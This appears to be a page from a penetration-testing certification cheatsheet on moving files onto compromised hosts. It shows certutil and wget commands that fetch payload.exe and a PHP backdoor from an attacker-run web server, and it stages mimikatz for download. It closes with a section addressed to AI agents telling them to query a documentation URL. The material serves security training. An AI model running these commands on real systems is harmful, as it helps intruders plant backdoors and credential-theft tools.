# Transferring Files

## [Python Web Server](https://developer.mozilla.org/en-US/docs/Learn/Common_questions/Tools_and_setup/set_up_a_local_testing_server) <a href="#python-web-server" id="python-web-server"></a>

**`Python`** modules can be useful for setting up a web server that hosts the files required for transfer. These modules

* Check `Python` version

```
python -V
python3 -V
py -v # on Windows
```

* [**`SimpleHTTPServer`**](https://docs.python.org/2.7/library/simplehttpserver.html#module-SimpleHTTPServer) - `python2` module

```
# If Python version returned is 2.X
python -m SimpleHTTPServer <PORT_NUMBER>
```

* [**`http.server`**](https://docs.python.org/3/library/http.server.html) - `python3` module

```
# If Python version is 3.X
python3 -m http.server <PORT>
```

```
# On Windows, try 
python -m http.server <PORT>
py -3 -m http.server <PORT>
```

**`e.g.`**

* Copy a file into the current directory and setup the web server to download the file into the target system

```
cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .

# Python 2.7
python -m SimpleHTTPServer 80

# Python 3.7
python3 -m http.server 80
```

* Files can be downloaded from a browser or using a `GET` request

<figure><img src="https://blog.syselement.com/~gitbook/image?url=https:%2F%2F1996978447-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FlhjuckuLbvBn36EoFL7P%252Fuploads%252Fgit-blob-9fda9e6cda6af72c652286651e6ce3dbd0958793%252Fimage-20230428215801961.png%3Falt=media&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=02187fd4cf5c8a3b16794fa68b4ec78a7315b845a698888d92aeee9aef91342f" alt=""><figcaption></figcaption></figure>

## Transferring Files <a href="#transferring-files-1" id="transferring-files-1"></a>

## <mark style="color:orange;">**#Windows**</mark>

* Set up a web server to host the `payload.exe` file

```
# Attacker machine
cd /root/Desktop/ # payload.exe must be here
python3 -m http.server 80
```

* After gaining access to the Windows target system and spawned a command shell session, download the payload file on the target system using the `certutil` tool in `cmd`.

```
# Windows Target machine
cd C:\Temp
certutil -urlcache -f http://<ATTACKER-IP>/payload.exe payload.exe
```

## <mark style="color:orange;">**#Linux**</mark>

* After exploiting the Linux target, transfer the `php-backdoor.php` file to the target.
* 2 terminal sessions are necessary - use `tmux` utility to get more sessions.

[**`tmux`**](https://github.com/tmux/tmux/wiki) - *is a program, **terminal multiplexer**, which runs in a terminal and allows multiple other terminal programs to be run inside it*

```
sudo apt install tmux -y
```

```
# Attacker machine
tmux
# ... Exploitation with MSFconsole in Terminal 0 ...
# CTRL+B and then C to open a new terminal session

cd /usr/share/webshells/php/
ip -br -c a
	192.219.50.2
python3 -m http.server 80
```

```
# CTRL+B then 0 (zero) to navigate to the first Terminal session
# Target machine
/bin/bash -i
wget http://192.219.50.2/php-backdoor.php
```

<figure><img src="https://blog.syselement.com/~gitbook/image?url=https:%2F%2F1996978447-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FlhjuckuLbvBn36EoFL7P%252Fuploads%252Fgit-blob-3881bc1a643bbd134eba3dcaeed1b07ea5383ec9%252Fimage-20230428232055646.png%3Falt=media&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=a7d23f216c49441834db183363f4894bb1c55083e462d805f9e8ddd0aae2e310" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://yashmehta.gitbook.io/ejptv2-cheatsheet/post-exploitation/transferring-files.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.